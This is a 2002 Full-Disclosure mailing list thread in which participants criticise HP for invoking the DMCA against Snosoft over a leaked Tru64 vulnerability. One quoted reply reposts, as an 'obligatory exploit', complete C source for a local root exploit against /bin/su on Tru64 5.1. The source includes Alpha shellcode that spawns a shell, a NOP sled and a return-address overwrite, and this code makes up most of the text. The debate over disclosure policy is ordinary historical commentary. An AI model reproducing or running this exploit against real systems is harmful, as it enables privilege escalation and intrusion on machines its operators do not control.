OT: Snosoft vs HP

[full-disclosure () lists netsys com (Moyer, Shawn)]

I'm looking forward to seeing more of ths novel "why patch when you can sue"
approach. Anybody wanna buy a bunch of Alphas? Cheap? Boo, hiss, and poo on
HP for this juvenile and moronic approach to dealing with an exposure. As I
read the press on this, the vuln has been known since at least spring, yet
still no patch, and when the sploit leaks, these idiots unleash the lawyers.
How lame.

Yes, it leaked through improper channels without a concurrent patch. So? I'm
more disgusted with the fact that it's taken HP this long to fix the vuln. I
guess the fired all the OSF/1 (sorry, Tru64, puke, puke, whatever) people.

I wonder if the Apache Group and Theo's bunch can pull this same swindle.
They both got blindsided by improperly released vuln's too, but rather then
kvetch and whine and point fingers, they fixed 'em and moved on. 

"Please save me, DMCA! I've been violated! Waaaaah!"






--shawn


> -----Original Message-----
> From: ATD [mailto:simon () snosoft com]
> Sent: Wednesday, July 31, 2002 11:27
> To: full-disclosure () lists netsys com
> Subject: Re: [Full-disclosure] OT: Snosoft vs HP
>
>
> What is even more interesting is that this issue has been known for
> quite a while, yet no one did anything about it.
>
>
> Adriel
>
>
> On Wed, 2002-07-31 at 12:22, Len Rose wrote:
> > It's interesting to note that the exploit was removed from
> > SecurityFocus' site. I wonder if HP is going to demand people
> > remove it from all archives everywhere? 
> >
> > Obligatory exploit:
> >
> > /*
> >  /bin/su tru64 5.1
> >  works with non-exec stack enabled
> >  
> >  stripey is the man
> >
> >  developed at http://www.snosoft.com in the cerebrum labs
> >
> >  phased
> >  phased at mail.ru
> > */
> >
> > #include <stdio.h>
> > #include <stdlib.h>
> > #include <string.h>
> > #include <unistd.h>
> >
> > char shellcode[]=
> >         "\x30\x15\xd9\x43"      /* subq $30,200,$16             */
> >         "\x11\x74\xf0\x47"      /* bis $31,0x83,$17             */
> >         "\x12\x14\x02\x42"      /* addq $16,16,$18              */
> >         "\xfc\xff\x32\xb2"      /* stl $17,-4($18)              */
> >         "\x12\x94\x09\x42"      /* addq $16,76,$18              */
> >         "\xfc\xff\x32\xb2"      /* stl $17,-4($18)              */
> >         "\xff\x47\x3f\x26"      /* ldah $17,0x47ff($31)         */
> >         "\x1f\x04\x31\x22"      /* lda $17,0x041f($17)          */
> >         "\xfc\xff\x30\xb2"      /* stl $17,-4($16)              */
> >         "\xf7\xff\x1f\xd2"      /* bsr $16,-32                  */
> >         "\x10\x04\xff\x47"      /* clr $16                      */
> >         "\x11\x14\xe3\x43"      /* addq $31,24,$17              */
> >         "\x20\x35\x20\x42"      /* subq $17,1,$0                */
> >         "\xff\xff\xff\xff"      /* callsys ( disguised )        */
> >         "\x30\x15\xd9\x43"      /* subq $30,200,$16             */
> >         "\x31\x15\xd8\x43"      /* subq $30,192,$17             */
> >         "\x12\x04\xff\x47"      /* clr $18                      */
> >         "\x40\xff\x1e\xb6"      /* stq $16,-192($30)            */
> >         "\x48\xff\xfe\xb7"      /* stq $31,-184($30)            */
> >         "\x98\xff\x7f\x26"      /* ldah $19,0xff98($31)         */
> >         "\xd0\x8c\x73\x22"      /* lda $19,0x8cd0($19)          */
> >         "\x13\x05\xf3\x47"      /* ornot $31,$19,$19            */
> >         "\x3c\xff\x7e\xb2"      /* stl $19,-196($30)            */
> >         "\x69\x6e\x7f\x26"      /* ldah $19,0x6e69($31)         */
> >         "\x2f\x62\x73\x22"      /* lda $19,0x622f($19)          */
> >         "\x38\xff\x7e\xb2"      /* stl $19,-200($30)            */
> >         "\x13\x94\xe7\x43"      /* addq $31,60,$19              */
> >         "\x20\x35\x60\x42"      /* subq $19,1,$0                */
> >         "\xff\xff\xff\xff";     /* callsys ( disguised )        */
> >
> > /* shellcode by Taeho Oh */
> >
> > main(int argc, char *argv[]) {
> > int i, j;
> > char buffer[8239];
> > char payload[15200];
> > char nop[] = "\x1f\x04\xff\x47";
> >
> > bzero(&buffer, 8239);
> > bzero(&payload, 15200);
> >
> > for (i=0;i<8233;i++)
> >         buffer[i] = 0x41;
> >
> > /* 0x140010401 */
> >
> >         buffer[i++] = 0x01;
> >         buffer[i++] = 0x04;
> >         buffer[i++] = 0x01;
> >         buffer[i++] = 0x40;
> >         buffer[i++] = 0x01;
> >
> > for (i=0;i<15000;) {
> >         for(j=0;j<4;j++)  {
> >                 payload[i++] = nop[j];
> >         }
> > }
> >
> > for (i=i,j=0;j<sizeof(shellcode);i++,j++)
> >         payload[i] = shellcode[j];
> >
> >         printf("/bin/su by phased\n");
> >         printf("payload %db\n", strlen(payload));
> >         printf("buffer %db\n", strlen(buffer));
> >
> >         execl("/usr/bin/su", "su", buffer, payload, 0);
> >
> > }
> >
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Full-Disclosure () lists netsys com
> > http://lists.netsys.com/mailman/listinfo/full-disclosure
> -- 
>
> -------------------------------------------------------
> Secure Network Operations, Inc.| http://www.snosoft.com
> Cerebrum Project               | cerebrum () snosoft com
> Strategic Reconnaissance Team  | recon () snosoft com
> -------------------------------------------------------